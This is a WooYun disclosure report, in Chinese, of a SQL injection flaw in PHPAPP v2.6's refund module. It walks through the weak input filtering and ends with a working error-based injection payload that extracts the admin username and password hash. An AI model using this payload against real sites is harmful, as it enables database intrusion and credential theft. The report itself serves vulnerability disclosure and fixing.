PHPAPP注入第四枚（各种无视过滤） | wooyun-2014-088699| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-088699

漏洞标题：PHPAPP注入第四枚（各种无视过滤）

漏洞作者：路人甲

提交时间：2014-12-29 11:17

修复时间：2015-03-29 11:18

公开时间：2015-03-29 11:18

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-29：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-03-29：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

PHPAPP注入第四枚（各种无视过滤）

详细说明：

在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看(2014-12-11更新的)。
PSOT注入点：wwww.xxx.com/member.php?action=1&app=43&cid=1&rid=2, 存在漏洞的文件在/phpapp/apps/refund/member_phpapp.php
下面分析一下漏洞产生的原因
第一处绕过：
先看看是如何得到$_POST中的内容的，$this->POST=$this->POSTArray();去看看POSTArray()
/phpapp/apps/core/class/core_class_phpapp.php

function POSTArray(){
         $postarr=array();
		 if(is_array($_POST)){
			  
			   foreach($_POST as $key=>$value){
				   
					  $keyarr=explode('_',$key);
					  
					  $count=count($keyarr);
					  	  
					  if($count>1){
						    $keyname='';
					        for($i=0;$i<$count-1;$i++){
							     if($keyname){
							          $keyname.='_'.$keyarr[$i];
								 }else{
									  $keyname=$keyarr[$i];
						 		 }
					        }
						   
						   
						    if($keyarr[$count-1]=='s'){	
							     $isajax=empty($_SERVER['HTTP_X_REQUESTED_WITH']) ? '' : $_SERVER['HTTP_X_REQUESTED_WITH'];
								
								 if($isajax=='XMLHttpRequest'){
					                    $value=$this->ConvertStr($value);
									 
								 }
							
								 $postarr[$keyname]=$this->str($value,0,1,0,0,0,1);
							}elseif($keyarr[$count-1]=='d'){
								 $postarr[$keyname]=intval($value);
							}elseif($keyarr[$count-1]=='f'){
								 $postarr[$keyname]=floatval($value);
							}else{
								 $postarr[$key]=$value;
							}		
						   
						   
					  }else{
						   $postarr[$key]=$value;
					  }
					  
					  
			   }      
		 }
		
		 return $postarr;
	}

可以看到有这么一句判断if($keyarr[$count-1]=='s')，即如果key的最后一个字母是’s’时，条件成立，用户的输入会经过str方法的防注处理。
如何绕过呢？当然是把key的最后一个字母’_s’删掉！
第二处绕过:

if($consumearr['cid']>0){	
					   $sellerarr=$this->GetMysqlOne('uid,username'," ".$this->GetTable('member')." WHERE uid='$consumearr[selleruid]' ");
					   $buyerarr=$this->GetMysqlOne('uid,username'," ".$this->GetTable('member')." WHERE uid='$consumearr[buyeruid]' ");                       
					   if($this->uid!=$consumearr['buyeruid']){				
							  $this->Refresh('对不起!您没有权限操作!',SURL.'/member.php?app='.$this->app.'&action=1&cid='.$this->cid.'&rid='.$this->rid.'&op=1');
					   }					 
					   if($this->POST['submit']){		
							  if($this->IsSQL('refund_money',"WHERE cid='$this->cid' AND process=3")){
									  $this->Refresh('该订单您已经申请退款并处理过了!',SURL.'/member.php?app='.$this->app.'&action=1');
							  }
						      if($consumearr['process']!=6){
						            $this->POST['money']=floatval($this->POST['money']);	
									$this->POST['content']=$this->str($this->POST['content'],0,0,0,1,0,0,1);	
									$consumemoney=$consumearr['amount']+$consumearr['fee'];
									if($this->POST['money']> $consumemoney){
										    $this->Refresh('对不起您申请的退款金额不能大于 '.$consumemoney.' 元！',SURL.'/member.php?app='.$this->app.'&action=1&cid='.$this->cid);
									}
						   			include_once(Core.'/class/photo_upload_phpapp.php');
									 if($_FILES['buyerphoto']['size']>0){
										   $photoid=empty($refund['buyerphoto']) ? 0 : intval($refund['buyerphoto']);
										   $upload=new UploadPhoto($_FILES['buyerphoto'],$photoid);
										   $photoid=$upload->CheckUpload();
									 }else{
										   if(!empty($refund['buyerphoto'])){
												 $photoid=intval($refund['buyerphoto']);
										   }
									 }
$this->Update('consume',array('refundmoney'=>$this->POST['money'],'process'=>4),array()," WHERE cid='$consumearr[cid]'"); 
								   $edittxt='';
								   if($this->rid>0){
									    $edittxt='修改了';
								   }
						  		   if($this->rid>0){
$this->Update('refund_money',$this->POST,array('dateline'=>$this->NowTime(),'buyeruid'=>$consumearr['buyeruid'],'selleruid'=>$consumearr['selleruid'],'tid'=>$consumearr['tid'],'cid'=>$consumearr['cid'],'oid'=>$consumearr['oid'],'buyerphoto'=>$photoid,'process'=>1)," WHERE rid='$this->rid' AND buyeruid='$this->uid'");
									 }

再往下看，看到了这句$this->Update('refund_money',$this->POST,array('dateline'=>$this->NowTime(),'buyeruid'=>$consumearr['buyeruid'],'selleruid'=>$consumearr['selleruid'],'tid'=>$consumearr['tid'],'cid'=>$consumearr['cid'],'oid'=>$consumearr['oid'],'buyerphoto'=>$photoid,'process'=>1)," WHERE rid='$this->rid' AND buyeruid='$this->uid'");把整个post的内容带入了Update方法
再去看看Update方法，/phpapp/apps/core/class/mysql_class_phpapp.php

//表名, 修改数组,添加合并数组,条件
	function Update($tablename,$setarray=array(),$addarr=array(),$whereif=''){		 
		 $setarray=array_merge($setarray,$addarr);		 
		 $deletearr=$this->GetMysqlFieldArray($tablename);		 
		 if($setarray){
			  $sqlset='';
			  foreach($setarray as $key=>$value){
			        $_key=strtolower($key);
				    if(isset($deletearr[$_key])){
				           $value=$this->dataTypeConvert($value,$deletearr[$_key]);
				    	   if($sqlset){
							    $sqlset.=',`'.$_key.'`=\''.$value.'\'';
						   }else{
							    $sqlset='`'.$_key.'`=\''.$value.'\'';
						   }					
					}
			  }			  
			  $query=sprintf('UPDATE %s SET %s %s',$this->GetTable($tablename),$sqlset,$whereif);
	          //exit($query);
			  return $this->MysqlQuery($query);			  
		 }else{
			  return false;
		 }	      
	}

Update代码防注分析：
1、通过GetMysqlFieldArray方法获取数据表的所有字段名及每个字段对应的属性；
2、判断用户post的内容中的key是否是数据表中的字段名，防止了key的注入；
3、通过dataTypeConvert方法把用户提交的数据按数据表中各字段的类型进行防注转换。
如果以上每一步的代码都正确实现了的话，应该是没有办法注入的，但是这里的第3步中，也就是dataTypeConvert方法的实现时有疏忽，看下面代码。

function dataTypeConvert($data,$type){
        switch($type){
            case 'int':
                $data=intval($data);
                break;
            case 'real':
                $data=doubleval($data);
                break;
            case 'timestamp':
                $data=intval($data);
                break;
            case 'string':
            case 'year':
            case 'date':
            case 'time':
            case 'datetime':
            case 'blob':
            default:
                //$data=intval($data);
                break;
        }
        return $data;
    }

只对int、real、timestamp做了处理，其他的类型这里没有处理。
绕过方法：
在提交http请求时，可以提交其他类型的参数，但其他参数必须是数据表（phpapp_refund_money）中的字段，且类型不是int、real、timestamp的参数。这里有多个参数可以注入。
测试时请保证自己的账号有可退款的订单，如果没有的话，（真实的网站肯定可以有订单）为了测试方便，把if($consumearr['cid']>0)改为if(true==true)且把if($this->uid!=$consumearr['buyeruid']){ $this->Refresh('对不起!您没有权限操作!',SURL.'/member.php?app='.$this->app.'&action=1&cid='.$this->cid.'&rid='.$this->rid.'&op=1'); }注释掉
下面以sellercontent为例进行证明：
Phpapp可以显错，那就用error-based blind进行注入。
Pyload：(POST提交)

cid=1&submit=2&sellercontent=test' or(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat
(0x23,username,0x23,password) from phpapp_member limit 0,1))a from information_schema.tables group by a)b) or'

注入成功，管理员用户名及密码如下图中所示：

漏洞证明：

见详细证明

修复方案：

$this->str()

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

WooYun.org

漏洞概要 关注数(24) 关注此漏洞